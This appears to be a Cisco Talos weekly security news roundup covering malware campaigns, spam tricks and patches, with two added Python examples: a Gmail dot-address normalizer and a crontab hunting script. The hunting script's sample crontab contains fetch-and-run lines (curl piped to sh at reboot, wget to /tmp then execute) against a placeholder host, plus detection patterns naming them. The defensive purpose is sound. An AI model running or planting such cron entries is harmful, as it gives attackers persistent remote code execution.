Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.
Top headlines this week
- Attackers continue to utilize a security hole in GoDaddy.com domains. The flaw allows unauthenticated users to send malicious emails via legitimate, dormant domains. Most recently, a group of attackers sent out a series of sextortion and bomb threat emails, as outlined in a report by Cisco Talos. GoDaddy is the world’s largest domain name registrar.
- Email spammers are taking advantage of a little-known Gmail feature that allows them to grow their reach. They can create so-called “dot emails,” which place a period between letters in their domain name. If the attackers are able to use a seemingly legitimate domain, they can then add dots to that domain and still control the emails, allowing them to send out more spam.
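One defensive response to the dot-email trick is to canonicalize addresses before filtering, rate-limiting or deduplicating them, so that every dotted spelling of one Gmail mailbox collapses to a single key. The following is an added example written for this roundup, not code from Talos or Google; it relies on the documented Gmail behaviour that dots in the local part (the text before the "@") are ignored for delivery, and the domain list, sample addresses and function names are the example's own assumptions.

```python
# Added example (not from the Talos post): canonicalize Gmail addresses so that
# "dot variants" of one mailbox collapse to a single key for filtering,
# rate-limiting or deduplication. Gmail ignores dots in the local part (before
# the "@"), so j.o.h.n@gmail.com and john@gmail.com reach the same inbox.
from collections import defaultdict

# Domains known to ignore dots in the local part (assumption: illustrative list,
# extend it for other providers you have verified behave the same way).
DOT_INSENSITIVE_DOMAINS = {"gmail.com", "googlemail.com"}


def canonical_address(addr: str) -> str:
    """Return a comparison key for an email address.

    For dot-insensitive domains the dots in the local part are removed and the
    local part is lower-cased. The domain is lower-cased for every address.
    Local parts at other domains are left untouched, because other providers
    may treat dots (and case) as significant.
    """
    addr = addr.strip()
    if addr.count("@") != 1:
        raise ValueError(f"not a simple address: {addr!r}")
    local, domain = addr.rsplit("@", 1)
    domain = domain.lower()
    if domain in DOT_INSENSITIVE_DOMAINS:
        local = local.replace(".", "").lower()
    return f"{local}@{domain}"


def group_by_mailbox(addresses):
    """Group raw sender addresses by the mailbox they actually resolve to."""
    groups = defaultdict(list)
    for addr in addresses:
        groups[canonical_address(addr)].append(addr)
    return dict(groups)


def dot_variant_count(addresses):
    """Return {canonical_address: number_of_distinct_spellings} for mailboxes
    seen under more than one spelling. Many spellings of one mailbox in a short
    window is a useful review signal for sign-up or sender abuse."""
    counts = {}
    for key, spellings in group_by_mailbox(addresses).items():
        distinct = len(set(spellings))
        if distinct > 1:
            counts[key] = distinct
    return counts


# Constructed sample of sender addresses, as a mail gateway might log them.
SAMPLE_SENDERS = [
    "promo@gmail.com",
    "p.romo@gmail.com",
    "pr.o.mo@Gmail.com",
    "P.R.O.M.O@gmail.com",
    "alice@example.org",
    "a.lice@example.org",
]

if __name__ == "__main__":
    for mailbox, spellings in group_by_mailbox(SAMPLE_SENDERS).items():
        print(mailbox, "<-", spellings)
    print("multi-spelling mailboxes:", dot_variant_count(SAMPLE_SENDERS))
```

The four Gmail spellings collapse to one key, while the two example.org spellings stay separate because nothing on the page (or in the example's assumptions) says that provider ignores dots; applying the normalization only to domains you have verified avoids merging mailboxes that are genuinely different.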
- Facebook is stepping up its crackdown on fake accounts. The social media site took down thousands of pages and profiles posting malicious content. The pages originated from Iran and Indonesia. Earlier this month, it also removed Russian- and Filipino-backed, politically motivated pages.
From Talos
- An evolution of the LuckyCat malware, known as “ExileRAT,” is targeting Tibetan users. Talos recently discovered an email campaign that sent malicious documents to members of a mailing list related to the Tibetan government-in-exile. Based on the malware’s capabilities, it’s believed the attackers aim to spy on their victims.
- Cryptocurrency miners, trojans lead malware in 2018. Talos this week published a roundup of the SNORT® rules that triggered the most last year. Rules that helped protect users against miners and trojans were among the most frequently triggered.
Malware roundup
- A new backdoor is targeting Linux systems. Known as “SpeakUp,” the remote access trojan allows attackers to gain boot persistence by modifying the local cron utility, run shell commands, and execute downloaded files.
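Because the persistence described above lives in cron, a useful hunting step is to parse crontab-format files and flag entries that run at boot or fetch and execute remote content. The following is an added example written for this roundup, not Talos code and not a SpeakUp signature: the heuristic patterns, the constructed sample crontab and the function names are all the example's own assumptions, meant to be tuned for a real fleet.

```python
# Added example (not from the Talos post): flag crontab lines that look like
# download-and-execute persistence. The patterns are illustrative assumptions
# for hunting, not indicators taken from SpeakUp.
import re

# Named heuristics (assumption: starting list, tune for your environment).
SUSPICIOUS_PATTERNS = [
    ("downloader piped into a shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("downloader writing into a scratch directory",
     re.compile(r"\b(curl|wget)\b.*\s-o\s*/(tmp|dev/shm|var/tmp)/", re.I)),
    ("executes a file from a scratch directory",
     re.compile(r"(^|[\s;&|])/(tmp|dev/shm|var/tmp)/\S+")),
    ("inline interpreter one-liner",
     re.compile(r"\b(python|perl|php)\S*\s+-c\s")),
]


def parse_crontab(text):
    """Yield (schedule, command) for each real entry in crontab-format text.

    Skips blank lines, comments and variable assignments (SHELL=..., PATH=...),
    and handles both '@reboot'-style schedules and the five-field form.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:  # environment assignment, not a job
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) == 2:
                yield parts[0], parts[1]
        else:
            parts = line.split(None, 5)
            if len(parts) == 6:
                yield " ".join(parts[:5]), parts[5]


def suspicious_cron_entries(text):
    """Return [(schedule, command, reasons)] for entries worth an analyst's look.

    An entry is flagged when any heuristic matches its command; '@reboot' is
    recorded as an extra reason because that is how boot persistence is gained,
    but a boot-time job alone is not flagged (plenty of legitimate ones exist).
    """
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = [name for name, pat in SUSPICIOUS_PATTERNS if pat.search(command)]
        if reasons and schedule == "@reboot":
            reasons.insert(0, "runs at boot")
        if reasons:
            findings.append((schedule, command, reasons))
    return findings


# Constructed sample crontab (not from any real system); the hostnames use
# the reserved .invalid TLD so they cannot resolve.
SAMPLE_CRONTAB = """\
# constructed sample, not a real system's crontab
SHELL=/bin/sh
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup-check.sh
@reboot curl -s http://example.invalid/s.txt | sh
*/10 * * * * wget -q http://example.invalid/u -O /tmp/.u && /tmp/.u
"""

if __name__ == "__main__":
    for schedule, command, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"[{schedule}] {command}\n    -> {', '.join(reasons)}")
```

Feed it the contents of each file under /var/spool/cron, /etc/crontab and /etc/cron.d (all share this format); the two benign maintenance jobs in the sample pass, while the two fetch-and-run entries are returned with the reasons that triggered them. Treat the output as a triage list rather than a verdict, since legitimate deployment tooling sometimes matches these patterns too.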
- Banking customers in the U.K. fell victim to SS7 attacks that drained their accounts. Attackers exploited SS7 to intercept users’ phone calls and text messages and ultimately steal banking credentials. The U.K.’s Metro Bank was specifically targeted in the most recent campaign.
- New variants of DanaBot are targeting users in Europe. Machines already infected with DanaBot received disguised “updates” with the new variants, and attackers also sent out malspam to Polish users. These versions use a different command and control communication method than the original version from 2018.
The rest of the news
- Mozilla is working on a new feature for Firefox to protect against side-channel attacks. The new tool aims to be an improved version of Google Chrome’s Site Isolation feature, which helps browsers block potential side-channel attacks.
- The U.S. Department of Justice and Department of Homeland Security completed an election security report. The study, ordered by the White House, looks at whether the 2018 midterm elections were influenced by foreign interference. It’s unclear whether the report will ever be made public.
- Google patched a critical vulnerability in Android devices as part of its February security update. Attackers could use a specially crafted PNG image to completely take over the victim’s mobile device. Google says there’s no evidence of the bug being exploited in the wild.